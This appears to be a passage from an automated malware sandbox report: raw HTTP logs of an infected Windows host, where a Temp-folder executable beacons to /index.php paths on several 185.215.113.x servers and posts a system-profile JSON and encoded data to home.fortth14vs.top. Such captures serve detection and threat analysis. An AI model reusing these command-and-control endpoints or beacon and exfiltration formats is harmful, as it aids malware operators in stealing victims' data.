                                                                                                                                                                                                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:05.025590897 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:03 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  22192.168.2.450087185.215.113.209803668C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:04.545149088 CET156OUTPOST /Fru7Nk9/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.209
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                  Data Ascii: st=s
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:05.239176989 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:04 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  23192.168.2.450088185.215.113.1680
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:05.266992092 CET156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                  Data Ascii: st=s
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:05.935306072 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:04 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1 0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:06.020109892 CET308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 154
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                                                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:06.255639076 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:05 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  24192.168.2.450090185.215.113.1680
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:06.456221104 CET156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                  Data Ascii: st=s
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.141824961 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:05 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1 0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.143419981 CET308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 154
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                                                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.369981050 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:06 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  25192.168.2.450091185.215.113.20980
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:06.889177084 CET308OUTPOST /Fru7Nk9/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.209
                                                                                                                                                                                                                                                  Content-Length: 154
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 35 45 32 41 43 36 31 37 42 35 30 44 37 39 46 41 42 31 35 30 42 45 39 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 35 35 43 33 31 46 34 45 30 34 34 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 32
                                                                                                                                                                                                                                                  Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6255E2AC617B50D79FAB150BE92BB81278509C05BEA3669A52777FA613555C31F4E0442A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730502
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.569720030 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:06 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  26192.168.2.45009234.147.147.17380
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.130453110 CET12360OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                                                                                                                                                                                                                                  Host: home.fortth14vs.top
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Content-Length: 496411
                                                                                                                                                                                                                                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 37 32 32 38 37 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317722873", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.135381937 CET4944OUTData Raw: 61 70 38 4d 66 46 74 74 70 31 31 34 57 38 51 36 6a 48 71 2b 72 65 4a 50 44 39 33 38 4e 5c 2f 41 50 6a 43 61 66 54 72 6d 43 7a 73 49 58 31 6e 54 39 52 38 53 61 6f 73 56 6a 46 5a 78 66 62 39 4f 57 33 67 68 44 36 68 62 41 61 68 2b 49 63 38 45 39 72
                                                                                                                                                                                                                                                  Data Ascii: ap8MfFttp114W8Q6jHq+reJPD938N\/APjCafTrmCzsIX1nT9R8SaosVjFZxfb9OW3ghD6hbAah+Ic8E9rPLbXMMkFxBI8U0MqNHLFLGxV45EYBldWBDKQCCK\/d\/Cvxl4K8YMtxeP4UxGMo4jL63ssxyXN6WGwuc4GMm1QxFbDYXF46hPCYpJuhicNiq9JyU6NSVPEU6lGH83+MfgJ4g+BWb4PLONMLga+FzSh7bK+IMjrYvG
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.135407925 CET2472OUTData Raw: 6a 72 54 76 43 48 67 7a 34 79 61 68 72 52 75 50 37 4a 38 4c 51 61 4c 34 72 76 42 62 4a 48 4a 4d 6c 67 74 72 72 45 57 71 58 45 53 53 79 51 52 73 31 74 42 70 39 76 4b 38 5a 6e 45 73 79 44 62 62 52 79 53 6a 59 5c 2f 6e 50 69 6a 34 33 66 74 49 79 36
                                                                                                                                                                                                                                                  Data Ascii: jrTvCHgz4yahrRuP7J8LQaL4rvBbJHJMlgtrrEWqXESSyQRs1tBp9vK8ZnEsyDbbRySjY\/nPij43ftIy6t8Qf2g\/hd4\/wBN174CWM1pbaf4e1Pw9CV0+\/t7vQtNk8M6hocsUutaZewWuonxBf8AiC31e10\/U7SZWS6tbu5ttHs\/4A468P8ANs08VOOI5bi8Lk9N5rhatHHY6ri8Hg8dmed4fLsZhsqhicLh68HjcU8dKp
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.135473013 CET7416OUTData Raw: 30 76 38 41 6e 7a 6d 76 41 4f 66 59 58 4b 63 78 34 71 79 37 77 30 79 5c 2f 46 38 4b 55 75 4d 4d 5a 77 6c 67 4d 65 71 5c 2f 46 64 66 46 34 72 46 55 38 62 55 77 57 46 6d 73 4e 52 34 6a 6a 55 72 55 61 32 4a 68 44 4c 6f 34 79 6c 51 57 46 71 5a 70 4c
                                                                                                                                                                                                                                                  Data Ascii: 0v8AnzmvAOfYXKcx4qy7w0y\/F8KUuMMZwlgMeq\/FdfF4rFU8bUwWFmsNR4jjUrUa2JhDLo4ylQWFqZpL6hTccRJUV\/q5lPiBkGLzbLuFcw8TMxwvFlXg\/BcX5hgfY8J0cJhcLVwVLG4qH1itw5OlSr0cNOeYPBVa8sVTypfX6l8PF1XLrOt+Mde+MHh7T9b8K\/ta\/s6R\/HvxlNoGlXWoL+xT4n8Dnxr4Y+DmueJGiu20
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.135492086 CET2472OUTData Raw: 2b 79 37 5c 2f 41 4d 46 4b 50 32 6e 5c 2f 41 42 4a 6f 65 72 58 46 39 62 65 49 66 2b 45 5a 30 50 55 74 4d 31 46 68 66 57 39 39 6f 6e 77 2b 6a 38 44 65 4e 59 5c 2f 44 74 6c 62 58 52 6b 69 68 76 64 65 38 4d 2b 48 50 45 6e 77 35 30 4b 65 46 42 4e 70
                                                                                                                                                                                                                                                  Data Ascii: +y7\/AMFKP2n\/ABJoerXF9beIf+EZ0PUtM1FhfW99onw+j8DeNY\/DtlbXRkihvde8M+HPEnw50KeFBNpM3jma9sTDdoky\/wBBXwo8SaJ4m+FvgHWPDurafrelXPhPQkh1DTLqG8tXkttOgtrmHzoGZVntbmKa3u7dys1tcRy288cc0bIPJPjr\/wAExP2QP2prq68Y6lpOq+CfixfQ2N5rPjz4deInsNdm1WO0t44LrX\/D+
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.135529041 CET2472OUTData Raw: 43 72 30 4d 64 52 6e 37 47 6c 4f 65 4f 79 76 41 56 35 4f 4e 4e 7a 39 70 53 65 48 39 6e 43 63 32 34 56 4b 6a 74 4a 66 37 43 2b 41 6d 55 63 64 65 49 6e 41 4d 4f 4b 65 41 38 62 77 37 6c 65 51 5a 6a 6e 57 5a 59 62 48 59 4c 69 4f 4f 4b 70 34 5c 2f 4e
                                                                                                                                                                                                                                                  Data Ascii: Cr0MdRn7GlOeOyvAV5ONNz9pSeH9nCc24VKjtJf7C+AmUcdeInAMOKeA8bw7leQZjnWZYbHYLiOOKp4\/NKmDwdbKa+DzSlgcDmmHxWUfV8finhsK8Uo+1xFTEypwrxpSp\/y4f8EYBAv\/BTj9nFbWSWa2WX4zi3mnhS2nlgHwE+Kwhkmt457qOCV49rSQpdXKROSizzKokb+pLQ\/wBlH\/gpdYaB8QtP1r\/grH\/b2ueI\/
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.136241913 CET4944OUTData Raw: 31 38 7a 73 4b 66 79 4e 73 5c 2f 6a 48 38 5c 2f 77 43 76 2b 54 31 37 72 4a 5c 2f 65 33 78 5c 2f 76 4a 52 35 73 6e 2b 63 55 37 4f 4e 36 5c 2f 77 44 50 4c 5c 2f 36 31 4d 78 2b 37 64 39 32 39 5c 2f 4e 5c 2f 54 2b 58 2b 50 31 72 55 31 35 31 35 5c 2f
                                                                                                                                                                                                                                                  Data Ascii: 18zsKfyNs\/jH8\/wCv+T17rJ\/e3x\/vJR5sn+cU7ON6\/wDPL\/61Mx+7d929\/N\/T+X+P1rU1515\/18xh5Xek0af8sfL\/AMP6\/wBKY2\/zP77x\/wDPP\/P496mxjfh\/+3fys+T\/AC9\/8mmSeWuz\/WeZ3jj46f5\/+vQWVu5QpvTH+s\/z\/nv0JqFo\/n8nZ5zyf9t\/fj\/P1q42zZ9+NE\/1Ukn\/ALa469PX
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.140356064 CET7416OUTData Raw: 75 2b 45 50 45 66 68 33 78 33 34 62 31 4c 77 31 72 74 31 4e 34 4a 30 62 52 39 59 2b 79 36 72 61 66 59 72 75 37 74 4c 72 77 77 6d 67 32 30 65 6f 6d 48 48 6c 33 46 78 59 33 4b 42 67 70 6b 68 6b 41 41 72 34 54 74 34 72 65 79 6d 38 61 6e 34 69 2b 4b
                                                                                                                                                                                                                                                  Data Ascii: u+EPEfh3x34b1Lw1rt1N4J0bR9Y+y6rafYru7tLrwwmg20eomHHl3FxY3KBgpkhkAAr4Tt4reym8an4i+KPAvwP0j4d+O7z4U+LfE3xa1fxImjR\/Fay\/fXHw78Mad8LfBvxU8cfEDXINMH9vX+o+A\/BviLwtofh+40fW\/EfiHRtM8T+FLrXOKuvGGi2Phyy8YT+LPh7d+DNU+OHi74FaX4q0XxLr+p6Zeaz4L8LfDnxrq\/
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.140376091 CET2472OUTData Raw: 5c 2f 77 44 50 2b 4e 41 44 49 35 4e 72 52 37 45 38 31 5c 2f 38 41 6e 6e 31 36 5c 2f 77 43 66 72 6d 6f 56 33 78 78 75 37 5c 2f 50 30 38 33 39 31 30 39 4c 58 5c 2f 50 74 51 7a 66 76 50 37 76 38 41 32 79 50 6e 7a 64 76 66 36 48 31 5c 2f 43 6a 63 37
                                                                                                                                                                                                                                                  Data Ascii: \/wDP+NADI5NrR7E81\/8Ann16\/wCfrmoV3xxu7\/P0839109LX\/PtQzfvP7v8A2yPnzdvf6H1\/Cjc7ROiJvk\/5a\/8AXv7\/AOe9aez8\/wAP+Cbe\/wD3fxDy5D1+\/wD89Pw\/5e8dOah8z5X3vvf\/AJYyOP8AU\/5PeglFZvJ8v\/rnJ\/y2H1\/nU+JF\/vwp\/rRH5vn\/AOj\/ANKr3\/7v4lEEn7zn\/lsPtEv
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.140408039 CET4944OUTData Raw: 39 62 6c 6a 4b 31 53 45 59 53 78 4e 65 76 56 6f 34 61 70 68 5c 2f 44 68 39 50 66 50 36 57 54 35 35 6c 6c 48 67 44 68 36 4e 58 4f 38 4a 6b 75 48 64 61 72 56 78 31 61 68 6c 39 54 49 73 70 78 6d 56 59 50 45 59 50 43 50 46 52 70 55 73 52 4e 59 36 72
                                                                                                                                                                                                                                                  Data Ascii: 9bljK1SEYSxNevVo4aph\/Dh9PfP6WT55llHgDh6NXO8JkuHdarVx1ahl9TIspxmVYPEYPCPFRpUsRNY6ria9eg8LOWIj7aChPFZk8f5j4I+J\/hj4eeEvhh4X8UfGD4G+Af+EC\/bg+IHxt+L\/gv4i\/s4+Ofiv8aPHvwI8TfCH4C+DrvTv2UvjD4X\/Z98eXnwK+NHiKTwR478OaL438I\/tBfsw+LdB1iXw34hm+Jmi2thp
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:10.187676907 CET34608OUTData Raw: 55 6f 4c 45 30 63 70 34 58 77 47 47 70 79 55 49 38 37 72 59 32 65 49 39 76 38 41 57 70 78 4e 4d 34 5c 2f 61 42 63 61 35 6a 6a 4d 74 78 47 44 34 53 79 62 4c 61 4f 44 34 70 77 48 45 75 4c 6f 55 73 58 6d 4e 58 2b 30 58 67 63 66 78 44 6d 36 77 47 49
                                                                                                                                                                                                                                                  Data Ascii: UoLE0cp4XwGGpyUI87rY2eI9v8AWpxNM4\/aBca5jjMtxGD4SybLaOD4pwHEuLoUsXmNX+0XgcfxDm6wGInXxNWpLDVs14jxOKqU5zqRgsHl1LDqhHCxT\/ND9oXxn4S0v4OeNPgN4Q8Rn4k6R4G\/4JlaZ+zz4Z+J\/hjwX8StO8KfFf48+Nf+Clfwn\/az8caL4HsvGXg7wv4x0vwX4P8ABFpr2k6b4l+JnhH4e3Ou6p4M1pl
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.488617897 CET138INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  server: nginx/1.22.1
                                                                                                                                                                                                                                                  date: Fri, 03 Jan 2025 08:51:12 GMT
                                                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  content-length: 1
                                                                                                                                                                                                                                                  Data Raw: 30
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  27192.168.2.45009334.147.147.17380
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:13.266644955 CET99OUTGET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                                                                                                                                                                                                                                  Host: home.fortth14vs.top
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:13.885988951 CET353INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                                                                                                  server: nginx/1.22.1
                                                                                                                                                                                                                                                  date: Fri, 03 Jan 2025 08:51:13 GMT
                                                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  content-length: 207
                                                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  28192.168.2.45009434.147.147.17380
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:14.548032045 CET172OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                                                                                                                                                                                                                                  Host: home.fortth14vs.top
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                                                                                                                                                                                                                  Data Ascii: { "id1": "0", "data": "Done1" }
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:15.253083944 CET353INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                                                                                                  server: nginx/1.22.1
                                                                                                                                                                                                                                                  date: Fri, 03 Jan 2025 08:51:15 GMT
                                                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  content-length: 207
                                                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  29192.168.2.450095185.215.113.4380
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:29.494311094 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.43
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 73 74 3d 73
